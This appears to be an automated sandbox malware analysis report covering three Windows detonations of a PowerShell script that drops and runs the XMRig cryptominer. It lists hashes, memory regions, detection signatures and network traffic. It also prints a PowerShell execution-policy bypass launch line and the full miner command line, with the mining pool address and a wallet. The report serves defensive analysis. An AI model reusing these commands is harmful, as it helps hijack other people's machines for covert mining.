memory/1844-31-0x00007FF831843000-0x00007FF831844000-memory.dmp
memory/1844-32-0x00007FF831840000-0x00007FF83222C000-memory.dmp
memory/1844-33-0x00007FF831840000-0x00007FF83222C000-memory.dmp
memory/1844-66-0x000002D07A8C0000-0x000002D07A8CA000-memory.dmp
memory/1844-53-0x000002D07A8E0000-0x000002D07A8F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | cc47e5a5d54802233f04eece2ec71d2f |
| SHA1 | dcf2aa584ac92d9646d9ef6348f859ed16bb58b2 |
| SHA256 | 4efb5c3869432797304221fd43c352d864898f1573bb8fbcbbc69d1c724a6e58 |
| SHA512 | d3dc234152b581f502f803dbbb07a88b476022cc1ffdec76d6e301563c001a742d1cb5be140fb9c9a6c1ad2c1ce23840b6da7ffa15261f893c74cfb1a11f6e56 |
memory/3916-95-0x000002AE3ACD0000-0x000002AE3ACF0000-memory.dmp
memory/3916-96-0x00007FF7C1E20000-0x00007FF7C2A53000-memory.dmp
memory/3916-97-0x00007FF7C1E20000-0x00007FF7C2A53000-memory.dmp
memory/3916-98-0x00007FF7C1E20000-0x00007FF7C2A53000-memory.dmp
memory/3916-99-0x00007FF7C1E20000-0x00007FF7C2A53000-memory.dmp
memory/3916-100-0x00007FF7C1E20000-0x00007FF7C2A53000-memory.dmp
memory/3916-101-0x00007FF7C1E20000-0x00007FF7C2A53000-memory.dmp
memory/3916-102-0x00007FF7C1E20000-0x00007FF7C2A53000-memory.dmp
memory/3916-103-0x00007FF7C1E20000-0x00007FF7C2A53000-memory.dmp
memory/3916-104-0x00007FF7C1E20000-0x00007FF7C2A53000-memory.dmp
memory/3916-105-0x00007FF7C1E20000-0x00007FF7C2A53000-memory.dmp
memory/3916-106-0x00007FF7C1E20000-0x00007FF7C2A53000-memory.dmp
memory/3916-107-0x00007FF7C1E20000-0x00007FF7C2A53000-memory.dmp
memory/3916-108-0x00007FF7C1E20000-0x00007FF7C2A53000-memory.dmp
memory/3916-109-0x00007FF7C1E20000-0x00007FF7C2A53000-memory.dmp
memory/3916-110-0x00007FF7C1E20000-0x00007FF7C2A53000-memory.dmp
memory/3916-111-0x00007FF7C1E20000-0x00007FF7C2A53000-memory.dmp
memory/3916-112-0x00007FF7C1E20000-0x00007FF7C2A53000-memory.dmp
memory/3916-113-0x00007FF7C1E20000-0x00007FF7C2A53000-memory.dmp
memory/3916-114-0x00007FF7C1E20000-0x00007FF7C2A53000-memory.dmp
memory/3916-115-0x00007FF7C1E20000-0x00007FF7C2A53000-memory.dmp
memory/3916-116-0x00007FF7C1E20000-0x00007FF7C2A53000-memory.dmp
memory/3916-117-0x00007FF7C1E20000-0x00007FF7C2A53000-memory.dmp
memory/3916-118-0x00007FF7C1E20000-0x00007FF7C2A53000-memory.dmp
memory/3916-119-0x00007FF7C1E20000-0x00007FF7C2A53000-memory.dmp
memory/3916-120-0x00007FF7C1E20000-0x00007FF7C2A53000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
299s
Max time network
292s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3496 wrote to memory of 2768 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3496 wrote to memory of 2768 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.162.46.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.56.20.217.in-addr.arpa | udp |
Files
memory/3496-0-0x00007FFF9ADA3000-0x00007FFF9ADA4000-memory.dmp
memory/3496-5-0x0000014454F60000-0x0000014454F82000-memory.dmp
memory/3496-6-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp
memory/3496-10-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp
memory/3496-9-0x0000014455230000-0x00000144552A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ronmz524.3yt.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3496-25-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp
memory/3496-29-0x00007FFF9ADA3000-0x00007FFF9ADA4000-memory.dmp
memory/3496-30-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp
memory/3496-31-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp
memory/3496-32-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp
memory/3496-65-0x0000014455000000-0x000001445500A000-memory.dmp
memory/3496-52-0x00000144553B0000-0x00000144553C2000-memory.dmp
memory/2768-94-0x0000022278220000-0x0000022278240000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2768-95-0x00007FF787250000-0x00007FF787E83000-memory.dmp
memory/2768-96-0x00007FF787250000-0x00007FF787E83000-memory.dmp
memory/2768-97-0x00007FF787250000-0x00007FF787E83000-memory.dmp
memory/2768-98-0x00007FF787250000-0x00007FF787E83000-memory.dmp
memory/2768-99-0x00007FF787250000-0x00007FF787E83000-memory.dmp
memory/2768-100-0x00007FF787250000-0x00007FF787E83000-memory.dmp
memory/2768-101-0x00007FF787250000-0x00007FF787E83000-memory.dmp
memory/2768-102-0x00007FF787250000-0x00007FF787E83000-memory.dmp
memory/2768-103-0x00007FF787250000-0x00007FF787E83000-memory.dmp
memory/2768-104-0x00007FF787250000-0x00007FF787E83000-memory.dmp
memory/2768-105-0x00007FF787250000-0x00007FF787E83000-memory.dmp
memory/2768-106-0x00007FF787250000-0x00007FF787E83000-memory.dmp
memory/2768-107-0x00007FF787250000-0x00007FF787E83000-memory.dmp
memory/2768-108-0x00007FF787250000-0x00007FF787E83000-memory.dmp
memory/2768-109-0x00007FF787250000-0x00007FF787E83000-memory.dmp
memory/2768-110-0x00007FF787250000-0x00007FF787E83000-memory.dmp
memory/2768-111-0x00007FF787250000-0x00007FF787E83000-memory.dmp
memory/2768-112-0x00007FF787250000-0x00007FF787E83000-memory.dmp
memory/2768-113-0x00007FF787250000-0x00007FF787E83000-memory.dmp
memory/2768-114-0x00007FF787250000-0x00007FF787E83000-memory.dmp
memory/2768-115-0x00007FF787250000-0x00007FF787E83000-memory.dmp
memory/2768-116-0x00007FF787250000-0x00007FF787E83000-memory.dmp
memory/2768-117-0x00007FF787250000-0x00007FF787E83000-memory.dmp
memory/2768-118-0x00007FF787250000-0x00007FF787E83000-memory.dmp
memory/2768-119-0x00007FF787250000-0x00007FF787E83000-memory.dmp
memory/2768-120-0x00007FF787250000-0x00007FF787E83000-memory.dmp
memory/2768-121-0x00007FF787250000-0x00007FF787E83000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
300s
Max time network
305s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2236 wrote to memory of 1104 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2236 wrote to memory of 1104 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.56:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 56.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| NL | 23.62.61.136:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
Files
memory/2236-0-0x00007FFB43783000-0x00007FFB43785000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_svplhplo.4c4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2236-2-0x00000202AE860000-0x00000202AE882000-memory.dmp
memory/2236-11-0x00007FFB43780000-0x00007FFB44241000-memory.dmp
memory/2236-12-0x00007FFB43780000-0x00007FFB44241000-memory.dmp
memory/2236-13-0x00007FFB43783000-0x00007FFB43785000-memory.dmp
memory/2236-14-0x00007FFB43780000-0x00007FFB44241000-memory.dmp
memory/2236-16-0x00007FFB43780000-0x00007FFB44241000-memory.dmp
memory/2236-17-0x00000202AEA00000-0x00000202AEA12000-memory.dmp
memory/2236-18-0x00000202AE8A0000-0x00000202AE8AA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1104-49-0x0000028040F10000-0x0000028040F30000-memory.dmp
memory/1104-50-0x0000028040F60000-0x0000028040F80000-memory.dmp
memory/1104-51-0x00007FF63AF30000-0x00007FF63BB63000-memory.dmp
memory/1104-52-0x00007FF63AF30000-0x00007FF63BB63000-memory.dmp
memory/1104-54-0x0000028042850000-0x0000028042870000-memory.dmp
memory/1104-53-0x0000028042830000-0x0000028042850000-memory.dmp
memory/1104-55-0x00007FF63AF30000-0x00007FF63BB63000-memory.dmp
memory/2236-56-0x00007FFB43780000-0x00007FFB44241000-memory.dmp
memory/1104-57-0x00007FF63AF30000-0x00007FF63BB63000-memory.dmp
memory/1104-59-0x0000028042850000-0x0000028042870000-memory.dmp
memory/1104-58-0x0000028042830000-0x0000028042850000-memory.dmp
memory/1104-60-0x00007FF63AF30000-0x00007FF63BB63000-memory.dmp
memory/1104-61-0x00007FF63AF30000-0x00007FF63BB63000-memory.dmp
memory/1104-62-0x00007FF63AF30000-0x00007FF63BB63000-memory.dmp
memory/1104-63-0x00007FF63AF30000-0x00007FF63BB63000-memory.dmp
memory/1104-64-0x00007FF63AF30000-0x00007FF63BB63000-memory.dmp
memory/1104-65-0x00007FF63AF30000-0x00007FF63BB63000-memory.dmp
memory/1104-66-0x00007FF63AF30000-0x00007FF63BB63000-memory.dmp
memory/1104-67-0x00007FF63AF30000-0x00007FF63BB63000-memory.dmp
memory/1104-68-0x00007FF63AF30000-0x00007FF63BB63000-memory.dmp
memory/1104-69-0x00007FF63AF30000-0x00007FF63BB63000-memory.dmp
memory/1104-70-0x00007FF63AF30000-0x00007FF63BB63000-memory.dmp
memory/1104-71-0x00007FF63AF30000-0x00007FF63BB63000-memory.dmp
memory/1104-72-0x00007FF63AF30000-0x00007FF63BB63000-memory.dmp
memory/1104-73-0x00007FF63AF30000-0x00007FF63BB63000-memory.dmp
memory/1104-74-0x00007FF63AF30000-0x00007FF63BB63000-memory.dmp
memory/1104-75-0x00007FF63AF30000-0x00007FF63BB63000-memory.dmp
memory/1104-76-0x00007FF63AF30000-0x00007FF63BB63000-memory.dmp
memory/1104-77-0x00007FF63AF30000-0x00007FF63BB63000-memory.dmp
memory/1104-78-0x00007FF63AF30000-0x00007FF63BB63000-memory.dmp
memory/1104-79-0x00007FF63AF30000-0x00007FF63BB63000-memory.dmp
memory/1104-80-0x00007FF63AF30000-0x00007FF63BB63000-memory.dmp
memory/1104-81-0x00007FF63AF30000-0x00007FF63BB63000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win11-20240419-en
Max time kernel
295s
Max time network
295s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3440 wrote to memory of 4572 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3440 wrote to memory of 4572 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/3440-0-0x00007FFED5A23000-0x00007FFED5A25000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2shv2dcs.zoc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3440-9-0x000001F1AD0A0000-0x000001F1AD0C2000-memory.dmp
memory/3440-10-0x00007FFED5A20000-0x00007FFED64E2000-memory.dmp
memory/3440-11-0x00007FFED5A20000-0x00007FFED64E2000-memory.dmp
memory/3440-12-0x00007FFED5A20000-0x00007FFED64E2000-memory.dmp
memory/3440-13-0x00007FFED5A23000-0x00007FFED5A25000-memory.dmp
memory/3440-14-0x00007FFED5A20000-0x00007FFED64E2000-memory.dmp
memory/3440-15-0x00007FFED5A20000-0x00007FFED64E2000-memory.dmp
memory/3440-17-0x000001F1C58A0000-0x000001F1C58B2000-memory.dmp
memory/3440-18-0x000001F1AD130000-0x000001F1AD13A000-memory.dmp
memory/3440-37-0x00007FFED5A20000-0x00007FFED64E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4572-50-0x000001A615130000-0x000001A615150000-memory.dmp
memory/4572-51-0x000001A615180000-0x000001A6151A0000-memory.dmp
memory/4572-52-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-54-0x000001A616950000-0x000001A616970000-memory.dmp
memory/4572-53-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-55-0x000001A616970000-0x000001A616990000-memory.dmp
memory/4572-56-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-57-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-58-0x000001A616950000-0x000001A616970000-memory.dmp
memory/4572-59-0x000001A616970000-0x000001A616990000-memory.dmp
memory/4572-60-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-61-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-62-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-63-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-64-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-65-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-66-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-67-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-68-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-69-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-70-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-71-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-72-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-73-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-74-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-75-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-76-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-77-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
